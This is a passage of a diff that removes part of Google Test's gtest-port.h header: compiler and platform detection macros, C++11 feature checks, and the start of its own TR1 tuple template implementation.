-//   GTEST_INTENTIONAL_CONST_COND_POP_  - finish code section where MSVC C4127
-//                                        is suppressed.
-//
-// C++11 feature wrappers:
-//
-//   testing::internal::move  - portability wrapper for std::move.
-//
-// Synchronization:
-//   Mutex, MutexLock, ThreadLocal, GetThreadCount()
-//                            - synchronization primitives.
-//
-// Template meta programming:
-//   is_pointer     - as in TR1; needed on Symbian and IBM XL C/C++ only.
-//   IteratorTraits - partial implementation of std::iterator_traits, which
-//                    is not available in libCstd when compiled with Sun C++.
-//
-// Smart pointers:
-//   scoped_ptr     - as in TR2.
-//
-// Regular expressions:
-//   RE             - a simple regular expression class using the POSIX
-//                    Extended Regular Expression syntax on UNIX-like
-//                    platforms, or a reduced regular exception syntax on
-//                    other platforms, including Windows.
-//
-// Logging:
-//   GTEST_LOG_()   - logs messages at the specified severity level.
-//   LogToStderr()  - directs all log messages to stderr.
-//   FlushInfoLog() - flushes informational log messages.
-//
-// Stdout and stderr capturing:
-//   CaptureStdout()     - starts capturing stdout.
-//   GetCapturedStdout() - stops capturing stdout and returns the captured
-//                         string.
-//   CaptureStderr()     - starts capturing stderr.
-//   GetCapturedStderr() - stops capturing stderr and returns the captured
-//                         string.
-//
-// Integer types:
-//   TypeWithSize   - maps an integer to a int type.
-//   Int32, UInt32, Int64, UInt64, TimeInMillis
-//                  - integers of known sizes.
-//   BiggestInt     - the biggest signed integer type.
-//
-// Command-line utilities:
-//   GTEST_DECLARE_*()  - declares a flag.
-//   GTEST_DEFINE_*()   - defines a flag.
-//   GetInjectableArgvs() - returns the command line as a vector of strings.
-//
-// Environment variable utilities:
-//   GetEnv()             - gets the value of an environment variable.
-//   BoolFromGTestEnv()   - parses a bool environment variable.
-//   Int32FromGTestEnv()  - parses an Int32 environment variable.
-//   StringFromGTestEnv() - parses a string environment variable.
-
-#include <ctype.h>   // for isspace, etc
-#include <stddef.h>  // for ptrdiff_t
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#ifndef _WIN32_WCE
-# include <sys/types.h>
-# include <sys/stat.h>
-#endif  // !_WIN32_WCE
-
-#if defined __APPLE__
-# include <AvailabilityMacros.h>
-# include <TargetConditionals.h>
-#endif
-
-#include <algorithm>  // NOLINT
-#include <iostream>  // NOLINT
-#include <sstream>  // NOLINT
-#include <string>  // NOLINT
-#include <utility>
-
-#define GTEST_DEV_EMAIL_ "googletestframework@@googlegroups.com"
-#define GTEST_FLAG_PREFIX_ "gtest_"
-#define GTEST_FLAG_PREFIX_DASH_ "gtest-"
-#define GTEST_FLAG_PREFIX_UPPER_ "GTEST_"
-#define GTEST_NAME_ "Google Test"
-#define GTEST_PROJECT_URL_ "http://code.google.com/p/googletest/"
-
-// Determines the version of gcc that is used to compile this.
-#ifdef __GNUC__
-// 40302 means version 4.3.2.
-# define GTEST_GCC_VER_ \
-    (__GNUC__*10000 + __GNUC_MINOR__*100 + __GNUC_PATCHLEVEL__)
-#endif  // __GNUC__
-
-// Determines the platform on which Google Test is compiled.
-#ifdef __CYGWIN__
-# define GTEST_OS_CYGWIN 1
-#elif defined __SYMBIAN32__
-# define GTEST_OS_SYMBIAN 1
-#elif defined _WIN32
-# define GTEST_OS_WINDOWS 1
-# ifdef _WIN32_WCE
-#  define GTEST_OS_WINDOWS_MOBILE 1
-# elif defined(__MINGW__) || defined(__MINGW32__)
-#  define GTEST_OS_WINDOWS_MINGW 1
-# elif defined(WINAPI_FAMILY)
-#  include <winapifamily.h>
-#  if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
-#   define GTEST_OS_WINDOWS_DESKTOP 1
-#  elif WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_PHONE_APP)
-#   define GTEST_OS_WINDOWS_PHONE 1
-#  elif WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_APP)
-#   define GTEST_OS_WINDOWS_RT 1
-#  else
-    // WINAPI_FAMILY defined but no known partition matched.
-    // Default to desktop.
-#   define GTEST_OS_WINDOWS_DESKTOP 1
-#  endif
-# else
-#  define GTEST_OS_WINDOWS_DESKTOP 1
-# endif  // _WIN32_WCE
-#elif defined __APPLE__
-# define GTEST_OS_MAC 1
-# if TARGET_OS_IPHONE
-#  define GTEST_OS_IOS 1
-# endif
-#elif defined __FreeBSD__
-# define GTEST_OS_FREEBSD 1
-#elif defined __linux__
-# define GTEST_OS_LINUX 1
-# if defined __ANDROID__
-#  define GTEST_OS_LINUX_ANDROID 1
-# endif
-#elif defined __MVS__
-# define GTEST_OS_ZOS 1
-#elif defined(__sun) && defined(__SVR4)
-# define GTEST_OS_SOLARIS 1
-#elif defined(_AIX)
-# define GTEST_OS_AIX 1
-#elif defined(__hpux)
-# define GTEST_OS_HPUX 1
-#elif defined __native_client__
-# define GTEST_OS_NACL 1
-#elif defined __OpenBSD__
-# define GTEST_OS_OPENBSD 1
-#elif defined __QNX__
-# define GTEST_OS_QNX 1
-#endif  // __CYGWIN__
-
-// Macros for disabling Microsoft Visual C++ warnings.
-//
-//   GTEST_DISABLE_MSC_WARNINGS_PUSH_(4800 4385)
-//   /* code that triggers warnings C4800 and C4385 */
-//   GTEST_DISABLE_MSC_WARNINGS_POP_()
-#if _MSC_VER >= 1500
-# define GTEST_DISABLE_MSC_WARNINGS_PUSH_(warnings) \
-    __pragma(warning(push))                        \
-    __pragma(warning(disable: warnings))
-# define GTEST_DISABLE_MSC_WARNINGS_POP_()          \
-    __pragma(warning(pop))
-#else
-// Older versions of MSVC don't have __pragma.
-# define GTEST_DISABLE_MSC_WARNINGS_PUSH_(warnings)
-# define GTEST_DISABLE_MSC_WARNINGS_POP_()
-#endif
-
-#ifndef GTEST_LANG_CXX11
-// gcc and clang define __GXX_EXPERIMENTAL_CXX0X__ when
-// -std={c,gnu}++{0x,11} is passed.  The C++11 standard specifies a
-// value for __cplusplus, and recent versions of clang, gcc, and
-// probably other compilers set that too in C++11 mode.
-# if __GXX_EXPERIMENTAL_CXX0X__ || __cplusplus >= 201103L
-// Compiling in at least C++11 mode.
-#  define GTEST_LANG_CXX11 1
-# else
-#  define GTEST_LANG_CXX11 0
-# endif
-#endif
-
-// Distinct from C++11 language support, some environments don't provide
-// proper C++11 library support. Notably, it's possible to build in
-// C++11 mode when targeting Mac OS X 10.6, which has an old libstdc++
-// with no C++11 support.
-//
-// libstdc++ has sufficient C++11 support as of GCC 4.6.0, __GLIBCXX__
-// 20110325, but maintenance releases in the 4.4 and 4.5 series followed
-// this date, so check for those versions by their date stamps.
-// https://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html#abi.versioning
-#if GTEST_LANG_CXX11 && \
-    (!defined(__GLIBCXX__) || ( \
-        __GLIBCXX__ >= 20110325ul &&  /* GCC >= 4.6.0 */ \
-        /* Blacklist of patch releases of older branches: */ \
-        __GLIBCXX__ != 20110416ul &&  /* GCC 4.4.6 */ \
-        __GLIBCXX__ != 20120313ul &&  /* GCC 4.4.7 */ \
-        __GLIBCXX__ != 20110428ul &&  /* GCC 4.5.3 */ \
-        __GLIBCXX__ != 20120702ul))   /* GCC 4.5.4 */
-# define GTEST_STDLIB_CXX11 1
-#endif
-
-// Only use C++11 library features if the library provides them.
-#if GTEST_STDLIB_CXX11
-# define GTEST_HAS_STD_BEGIN_AND_END_ 1
-# define GTEST_HAS_STD_FORWARD_LIST_ 1
-# define GTEST_HAS_STD_FUNCTION_ 1
-# define GTEST_HAS_STD_INITIALIZER_LIST_ 1
-# define GTEST_HAS_STD_MOVE_ 1
-# define GTEST_HAS_STD_UNIQUE_PTR_ 1
-#endif
-
-// C++11 specifies that <tuple> provides std::tuple.
-// Some platforms still might not have it, however.
-#if GTEST_LANG_CXX11
-# define GTEST_HAS_STD_TUPLE_ 1
-# if defined(__clang__)
-// Inspired by http://clang.llvm.org/docs/LanguageExtensions.html#__has_include
-#  if defined(__has_include) && !__has_include(<tuple>)
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# elif defined(_MSC_VER)
-// Inspired by boost/config/stdlib/dinkumware.hpp
-#  if defined(_CPPLIB_VER) && _CPPLIB_VER < 520
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# elif defined(__GLIBCXX__)
-// Inspired by boost/config/stdlib/libstdcpp3.hpp,
-// http://gcc.gnu.org/gcc-4.2/changes.html and
-// http://gcc.gnu.org/onlinedocs/libstdc++/manual/bk01pt01ch01.html#manual.intro.status.standard.200x
-#  if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 2)
-#   undef GTEST_HAS_STD_TUPLE_
-#  endif
-# endif
-#endif
-
-// Brings in definitions for functions used in the testing::internal::posix
-// namespace (read, write, close, chdir, isatty, stat). We do not currently
-// use them on Windows Mobile.
-#if GTEST_OS_WINDOWS
-# if !GTEST_OS_WINDOWS_MOBILE
-#  include <direct.h>
-#  include <io.h>
-# endif
-// In order to avoid having to include <windows.h>, use forward declaration
-// assuming CRITICAL_SECTION is a typedef of _RTL_CRITICAL_SECTION.
-// This assumption is verified by
-// WindowsTypesTest.CRITICAL_SECTIONIs_RTL_CRITICAL_SECTION.
-struct _RTL_CRITICAL_SECTION;
-#else
-// This assumes that non-Windows OSes provide unistd.h. For OSes where this
-// is not the case, we need to include headers that provide the functions
-// mentioned above.
-# include <unistd.h>
-# include <strings.h>
-#endif  // GTEST_OS_WINDOWS
-
-#if GTEST_OS_LINUX_ANDROID
-// Used to define __ANDROID_API__ matching the target NDK API level.
-#  include <android/api-level.h>  // NOLINT
-#endif
-
-// Defines this to true iff Google Test can use POSIX regular expressions.
-#ifndef GTEST_HAS_POSIX_RE
-# if GTEST_OS_LINUX_ANDROID
-// On Android, <regex.h> is only available starting with Gingerbread.
-#  define GTEST_HAS_POSIX_RE (__ANDROID_API__ >= 9)
-# else
-#  define GTEST_HAS_POSIX_RE (!GTEST_OS_WINDOWS)
-# endif
-#endif
-
-#if GTEST_HAS_POSIX_RE
-
-// On some platforms, <regex.h> needs someone to define size_t, and
-// won't compile otherwise.  We can #include it here as we already
-// included <stdlib.h>, which is guaranteed to define size_t through
-// <stddef.h>.
-# include <regex.h>  // NOLINT
-
-# define GTEST_USES_POSIX_RE 1
-
-#elif GTEST_OS_WINDOWS
-
-// <regex.h> is not available on Windows.  Use our own simple regex
-// implementation instead.
-# define GTEST_USES_SIMPLE_RE 1
-
-#else
-
-// <regex.h> may not be available on this platform.  Use our own
-// simple regex implementation instead.
-# define GTEST_USES_SIMPLE_RE 1
-
-#endif  // GTEST_HAS_POSIX_RE
-
-#ifndef GTEST_HAS_EXCEPTIONS
-// The user didn't tell us whether exceptions are enabled, so we need
-// to figure it out.
-# if defined(_MSC_VER) || defined(__BORLANDC__)
-// MSVC's and C++Builder's implementations of the STL use the _HAS_EXCEPTIONS
-// macro to enable exceptions, so we'll do the same.
-// Assumes that exceptions are enabled by default.
-#  ifndef _HAS_EXCEPTIONS
-#   define _HAS_EXCEPTIONS 1
-#  endif  // _HAS_EXCEPTIONS
-#  define GTEST_HAS_EXCEPTIONS _HAS_EXCEPTIONS
-# elif defined(__clang__)
-// clang defines __EXCEPTIONS iff exceptions are enabled before clang 220714,
-// but iff cleanups are enabled after that. In Obj-C++ files, there can be
-// cleanups for ObjC exceptions which also need cleanups, even if C++ exceptions
-// are disabled. clang has __has_feature(cxx_exceptions) which checks for C++
-// exceptions starting at clang r206352, but which checked for cleanups prior to
-// that. To reliably check for C++ exception availability with clang, check for
-// __EXCEPTIONS && __has_feature(cxx_exceptions).
-#  define GTEST_HAS_EXCEPTIONS (__EXCEPTIONS && __has_feature(cxx_exceptions))
-# elif defined(__GNUC__) && __EXCEPTIONS
-// gcc defines __EXCEPTIONS to 1 iff exceptions are enabled.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__SUNPRO_CC)
-// Sun Pro CC supports exceptions.  However, there is no compile-time way of
-// detecting whether they are enabled or not.  Therefore, we assume that
-// they are enabled unless the user tells us otherwise.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__IBMCPP__) && __EXCEPTIONS
-// xlC defines __EXCEPTIONS to 1 iff exceptions are enabled.
-#  define GTEST_HAS_EXCEPTIONS 1
-# elif defined(__HP_aCC)
-// Exception handling is in effect by default in HP aCC compiler. It has to
-// be turned of by +noeh compiler option if desired.
-#  define GTEST_HAS_EXCEPTIONS 1
-# else
-// For other compilers, we assume exceptions are disabled to be
-// conservative.
-#  define GTEST_HAS_EXCEPTIONS 0
-# endif  // defined(_MSC_VER) || defined(__BORLANDC__)
-#endif  // GTEST_HAS_EXCEPTIONS
-
-#if !defined(GTEST_HAS_STD_STRING)
-// Even though we don't use this macro any longer, we keep it in case
-// some clients still depend on it.
-# define GTEST_HAS_STD_STRING 1
-#elif !GTEST_HAS_STD_STRING
-// The user told us that ::std::string isn't available.
-# error "Google Test cannot be used where ::std::string isn't available."
-#endif  // !defined(GTEST_HAS_STD_STRING)
-
-#ifndef GTEST_HAS_GLOBAL_STRING
-// The user didn't tell us whether ::string is available, so we need
-// to figure it out.
-
-# define GTEST_HAS_GLOBAL_STRING 0
-
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-#ifndef GTEST_HAS_STD_WSTRING
-// The user didn't tell us whether ::std::wstring is available, so we need
-// to figure it out.
-// TODO(wan@google.com): uses autoconf to detect whether ::std::wstring
-//   is available.
-
-// Cygwin 1.7 and below doesn't support ::std::wstring.
-// Solaris' libc++ doesn't support it either.  Android has
-// no support for it at least as recent as Froyo (2.2).
-# define GTEST_HAS_STD_WSTRING \
-    (!(GTEST_OS_LINUX_ANDROID || GTEST_OS_CYGWIN || GTEST_OS_SOLARIS))
-
-#endif  // GTEST_HAS_STD_WSTRING
-
-#ifndef GTEST_HAS_GLOBAL_WSTRING
-// The user didn't tell us whether ::wstring is available, so we need
-// to figure it out.
-# define GTEST_HAS_GLOBAL_WSTRING \
-    (GTEST_HAS_STD_WSTRING && GTEST_HAS_GLOBAL_STRING)
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-// Determines whether RTTI is available.
-#ifndef GTEST_HAS_RTTI
-// The user didn't tell us whether RTTI is enabled, so we need to
-// figure it out.
-
-# ifdef _MSC_VER
-
-#  ifdef _CPPRTTI  // MSVC defines this macro iff RTTI is enabled.
-#   define GTEST_HAS_RTTI 1
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif
-
-// Starting with version 4.3.2, gcc defines __GXX_RTTI iff RTTI is enabled.
-# elif defined(__GNUC__) && (GTEST_GCC_VER_ >= 40302)
-
-#  ifdef __GXX_RTTI
-// When building against STLport with the Android NDK and with
-// -frtti -fno-exceptions, the build fails at link time with undefined
-// references to __cxa_bad_typeid. Note sure if STL or toolchain bug,
-// so disable RTTI when detected.
-#   if GTEST_OS_LINUX_ANDROID && defined(_STLPORT_MAJOR) && \
-       !defined(__EXCEPTIONS)
-#    define GTEST_HAS_RTTI 0
-#   else
-#    define GTEST_HAS_RTTI 1
-#   endif  // GTEST_OS_LINUX_ANDROID && __STLPORT_MAJOR && !__EXCEPTIONS
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif  // __GXX_RTTI
-
-// Clang defines __GXX_RTTI starting with version 3.0, but its manual recommends
-// using has_feature instead. has_feature(cxx_rtti) is supported since 2.7, the
-// first version with C++ support.
-# elif defined(__clang__)
-
-#  define GTEST_HAS_RTTI __has_feature(cxx_rtti)
-
-// Starting with version 9.0 IBM Visual Age defines __RTTI_ALL__ to 1 if
-// both the typeid and dynamic_cast features are present.
-# elif defined(__IBMCPP__) && (__IBMCPP__ >= 900)
-
-#  ifdef __RTTI_ALL__
-#   define GTEST_HAS_RTTI 1
-#  else
-#   define GTEST_HAS_RTTI 0
-#  endif
-
-# else
-
-// For all other compilers, we assume RTTI is enabled.
-#  define GTEST_HAS_RTTI 1
-
-# endif  // _MSC_VER
-
-#endif  // GTEST_HAS_RTTI
-
-// It's this header's responsibility to #include <typeinfo> when RTTI
-// is enabled.
-#if GTEST_HAS_RTTI
-# include <typeinfo>
-#endif
-
-// Determines whether Google Test can use the pthreads library.
-#ifndef GTEST_HAS_PTHREAD
-// The user didn't tell us explicitly, so we make reasonable assumptions about
-// which platforms have pthreads support.
-//
-// To disable threading support in Google Test, add -DGTEST_HAS_PTHREAD=0
-// to your compiler flags.
-# define GTEST_HAS_PTHREAD (GTEST_OS_LINUX || GTEST_OS_MAC || GTEST_OS_HPUX \
-    || GTEST_OS_QNX || GTEST_OS_FREEBSD || GTEST_OS_NACL)
-#endif  // GTEST_HAS_PTHREAD
-
-#if GTEST_HAS_PTHREAD
-// gtest-port.h guarantees to #include <pthread.h> when GTEST_HAS_PTHREAD is
-// true.
-# include <pthread.h>  // NOLINT
-
-// For timespec and nanosleep, used below.
-# include <time.h>  // NOLINT
-#endif
-
-// Determines whether Google Test can use tr1/tuple.  You can define
-// this macro to 0 to prevent Google Test from using tuple (any
-// feature depending on tuple with be disabled in this mode).
-#ifndef GTEST_HAS_TR1_TUPLE
-# if GTEST_OS_LINUX_ANDROID && defined(_STLPORT_MAJOR)
-// STLport, provided with the Android NDK, has neither <tr1/tuple> or <tuple>.
-#  define GTEST_HAS_TR1_TUPLE 0
-# else
-// The user didn't tell us not to do it, so we assume it's OK.
-#  define GTEST_HAS_TR1_TUPLE 1
-# endif
-#endif  // GTEST_HAS_TR1_TUPLE
-
-// Determines whether Google Test's own tr1 tuple implementation
-// should be used.
-#ifndef GTEST_USE_OWN_TR1_TUPLE
-// The user didn't tell us, so we need to figure it out.
-
-// We use our own TR1 tuple if we aren't sure the user has an
-// implementation of it already.  At this time, libstdc++ 4.0.0+ and
-// MSVC 2010 are the only mainstream standard libraries that come
-// with a TR1 tuple implementation.  NVIDIA's CUDA NVCC compiler
-// pretends to be GCC by defining __GNUC__ and friends, but cannot
-// compile GCC's tuple implementation.  MSVC 2008 (9.0) provides TR1
-// tuple in a 323 MB Feature Pack download, which we cannot assume the
-// user has.  QNX's QCC compiler is a modified GCC but it doesn't
-// support TR1 tuple.  libc++ only provides std::tuple, in C++11 mode,
-// and it can be used with some compilers that define __GNUC__.
-# if (defined(__GNUC__) && !defined(__CUDACC__) && (GTEST_GCC_VER_ >= 40000) \
-      && !GTEST_OS_QNX && !defined(_LIBCPP_VERSION)) || _MSC_VER >= 1600
-#  define GTEST_ENV_HAS_TR1_TUPLE_ 1
-# endif
-
-// C++11 specifies that <tuple> provides std::tuple. Use that if gtest is used
-// in C++11 mode and libstdc++ isn't very old (binaries targeting OS X 10.6
-// can build with clang but need to use gcc4.2's libstdc++).
-# if GTEST_LANG_CXX11 && (!defined(__GLIBCXX__) || __GLIBCXX__ > 20110325)
-#  define GTEST_ENV_HAS_STD_TUPLE_ 1
-# endif
-
-# if GTEST_ENV_HAS_TR1_TUPLE_ || GTEST_ENV_HAS_STD_TUPLE_
-#  define GTEST_USE_OWN_TR1_TUPLE 0
-# else
-#  define GTEST_USE_OWN_TR1_TUPLE 1
-# endif
-
-#endif  // GTEST_USE_OWN_TR1_TUPLE
-
-// To avoid conditional compilation everywhere, we make it
-// gtest-port.h's responsibility to #include the header implementing
-// tuple.
-#if GTEST_HAS_STD_TUPLE_
-# include <tuple>  // IWYU pragma: export
-# define GTEST_TUPLE_NAMESPACE_ ::std
-#endif  // GTEST_HAS_STD_TUPLE_
-
-// We include tr1::tuple even if std::tuple is available to define printers for
-// them.
-#if GTEST_HAS_TR1_TUPLE
-# ifndef GTEST_TUPLE_NAMESPACE_
-#  define GTEST_TUPLE_NAMESPACE_ ::std::tr1
-# endif  // GTEST_TUPLE_NAMESPACE_
-
-# if GTEST_USE_OWN_TR1_TUPLE
-// This file was GENERATED by command:
-//     pump.py gtest-tuple.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2009 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Implements a subset of TR1 tuple needed by Google Test and Google Mock.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TUPLE_H_
-
-#include <utility>  // For ::std::pair.
-
-// The compiler used in Symbian has a bug that prevents us from declaring the
-// tuple template as a friend (it complains that tuple is redefined).  This
-// hack bypasses the bug by declaring the members that should otherwise be
-// private as public.
-// Sun Studio versions < 12 also have the above bug.
-#if defined(__SYMBIAN32__) || (defined(__SUNPRO_CC) && __SUNPRO_CC < 0x590)
-# define GTEST_DECLARE_TUPLE_AS_FRIEND_ public:
-#else
-# define GTEST_DECLARE_TUPLE_AS_FRIEND_ \
-    template <GTEST_10_TYPENAMES_(U)> friend class tuple; \
-   private:
-#endif
-
-// Visual Studio 2010, 2012, and 2013 define symbols in std::tr1 that conflict
-// with our own definitions. Therefore using our own tuple does not work on
-// those compilers.
-#if defined(_MSC_VER) && _MSC_VER >= 1600  /* 1600 is Visual Studio 2010 */
-# error "gtest's tuple doesn't compile on Visual Studio 2010 or later. \
-GTEST_USE_OWN_TR1_TUPLE must be set to 0 on those compilers."
-#endif
-
-// GTEST_n_TUPLE_(T) is the type of an n-tuple.
-#define GTEST_0_TUPLE_(T) tuple<>
-#define GTEST_1_TUPLE_(T) tuple<T##0, void, void, void, void, void, void, \
-    void, void, void>
-#define GTEST_2_TUPLE_(T) tuple<T##0, T##1, void, void, void, void, void, \
-    void, void, void>
-#define GTEST_3_TUPLE_(T) tuple<T##0, T##1, T##2, void, void, void, void, \
-    void, void, void>
-#define GTEST_4_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, void, void, void, \
-    void, void, void>
-#define GTEST_5_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, void, void, \
-    void, void, void>
-#define GTEST_6_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, void, \
-    void, void, void>
-#define GTEST_7_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    void, void, void>
-#define GTEST_8_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, void, void>
-#define GTEST_9_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, T##8, void>
-#define GTEST_10_TUPLE_(T) tuple<T##0, T##1, T##2, T##3, T##4, T##5, T##6, \
-    T##7, T##8, T##9>
-
-// GTEST_n_TYPENAMES_(T) declares a list of n typenames.
-#define GTEST_0_TYPENAMES_(T)
-#define GTEST_1_TYPENAMES_(T) typename T##0
-#define GTEST_2_TYPENAMES_(T) typename T##0, typename T##1
-#define GTEST_3_TYPENAMES_(T) typename T##0, typename T##1, typename T##2
-#define GTEST_4_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3
-#define GTEST_5_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4
-#define GTEST_6_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5
-#define GTEST_7_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6
-#define GTEST_8_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, typename T##7
-#define GTEST_9_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, \
-    typename T##7, typename T##8
-#define GTEST_10_TYPENAMES_(T) typename T##0, typename T##1, typename T##2, \
-    typename T##3, typename T##4, typename T##5, typename T##6, \
-    typename T##7, typename T##8, typename T##9
-
-// In theory, defining stuff in the ::std namespace is undefined
-// behavior.  We can do this as we are playing the role of a standard
-// library vendor.
-namespace std {
-namespace tr1 {
-
-template <typename T0 = void, typename T1 = void, typename T2 = void,
-    typename T3 = void, typename T4 = void, typename T5 = void,
-    typename T6 = void, typename T7 = void, typename T8 = void,
-    typename T9 = void>
-class tuple;
-
-// Anything in namespace gtest_internal is Google Test's INTERNAL
-// IMPLEMENTATION DETAIL and MUST NOT BE USED DIRECTLY in user code.
-namespace gtest_internal {
-
-// ByRef<T>::type is T if T is a reference; otherwise it's const T&.
-template <typename T>
-struct ByRef { typedef const T& type; };  // NOLINT
-template <typename T>
-struct ByRef<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper for ByRef.
-#define GTEST_BY_REF_(T) typename ::std::tr1::gtest_internal::ByRef<T>::type
-
-// AddRef<T>::type is T if T is a reference; otherwise it's T&.  This
-// is the same as tr1::add_reference<T>::type.
-template <typename T>
-struct AddRef { typedef T& type; };  // NOLINT
-template <typename T>
-struct AddRef<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper for AddRef.
-#define GTEST_ADD_REF_(T) typename ::std::tr1::gtest_internal::AddRef<T>::type
-
-// A helper for implementing get<k>().
-template <int k> class Get;
-
-// A helper for implementing tuple_element<k, T>.  kIndexValid is true
-// iff k < the number of fields in tuple type T.
-template <bool kIndexValid, int kIndex, class Tuple>
-struct TupleElement;
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 0, GTEST_10_TUPLE_(T) > {
-  typedef T0 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 1, GTEST_10_TUPLE_(T) > {
-  typedef T1 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 2, GTEST_10_TUPLE_(T) > {
-  typedef T2 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 3, GTEST_10_TUPLE_(T) > {
-  typedef T3 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 4, GTEST_10_TUPLE_(T) > {
-  typedef T4 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 5, GTEST_10_TUPLE_(T) > {
-  typedef T5 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 6, GTEST_10_TUPLE_(T) > {
-  typedef T6 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 7, GTEST_10_TUPLE_(T) > {
-  typedef T7 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 8, GTEST_10_TUPLE_(T) > {
-  typedef T8 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 9, GTEST_10_TUPLE_(T) > {
-  typedef T9 type;
-};
-
-}  // namespace gtest_internal
-
-template <>
-class tuple<> {
- public:
-  tuple() {}
-  tuple(const tuple& /* t */)  {}
-  tuple& operator=(const tuple& /* t */) { return *this; }
-};
-
-template <GTEST_1_TYPENAMES_(T)>
-class GTEST_1_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0) : f0_(f0) {}
-
-  tuple(const tuple& t) : f0_(t.f0_) {}
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple(const GTEST_1_TUPLE_(U)& t) : f0_(t.f0_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_1_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_1_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    return *this;
-  }
-
-  T0 f0_;
-};
-
-template <GTEST_2_TYPENAMES_(T)>
-class GTEST_2_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1) : f0_(f0),
-      f1_(f1) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_) {}
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple(const GTEST_2_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_) {}
-  template <typename U0, typename U1>
-  tuple(const ::std::pair<U0, U1>& p) : f0_(p.first), f1_(p.second) {}
-
